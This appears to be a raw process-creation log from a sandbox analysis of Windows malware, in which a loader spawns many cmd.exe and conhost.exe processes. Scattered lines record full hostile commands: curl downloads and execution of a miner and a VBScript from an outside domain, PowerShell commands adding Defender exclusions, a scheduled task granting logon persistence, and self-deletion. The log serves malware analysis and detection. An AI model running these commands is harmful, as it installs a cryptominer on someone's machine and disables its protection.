                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c cd /d %temp% && del miner2.0.exe 2>nul && curl -o miner2.0.exe https://eijfrhegrtbrfcd.online/download/miner2.0.exe && start miner2.0.exe
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\curl.exe curl -o miner2.0.exe https://eijfrhegrtbrfcd.online/download/miner2.0.exe
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\miner2.0.exe miner2.0.exe
                        Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe | Process created: C:\Windows\System32\cmd.exe "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user'
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\svchost64.exe "C:\Users\user\AppData\Local\Temp\miner2.0.exe"
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\svchost64.exe C:\Users\user\AppData\Local\Temp\svchost64.exe "C:\Users\user\AppData\Local\Temp\miner2.0.exe"
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"'
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp'
                        Source: unknownProcess created: C:\Windows\System32\services64.exe C:\Windows\system32\services64.exe
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\services64.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user'
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeProcess created: C:\Windows\System32\services64.exe "C:\Windows\system32\services64.exe"
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\AppData\Local\Temp\svchost64.exe"
                        Source: C:\Windows\System32\services64.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user'
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\choice.exe choice /C Y /N /D Y /T 3
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\services64.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\svchost64.exe "C:\Windows\system32\services64.exe"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\svchost64.exe C:\Users\user\AppData\Local\Temp\svchost64.exe "C:\Windows\system32\services64.exe"
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeProcess created: C:\Windows\System32\Microsoft\Libs\sihost64.exe "C:\Windows\system32\Microsoft\Libs\sihost64.exe"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"'
                        Source: C:\Windows\System32\services64.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\svchost64.exe "C:\Windows\system32\services64.exe"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp'
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\svchost64.exe C:\Users\user\AppData\Local\Temp\svchost64.exe "C:\Windows\system32\services64.exe"
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\AppData\Local\Temp\svchost64.exe"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\choice.exe choice /C Y /N /D Y /T 3
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeProcess created: C:\Windows\System32\Microsoft\Libs\sihost64.exe "C:\Windows\system32\Microsoft\Libs\sihost64.exe"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"'
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\choice.exe choice /C Y /N /D Y /T 3
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp'
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe "C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c cd /d %temp% && del conf.vbs 2>nul && curl -o conf.vbs https://eijfrhegrtbrfcd.online/download/conf1.php && cscript conf.vbsJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c Jump to behavior
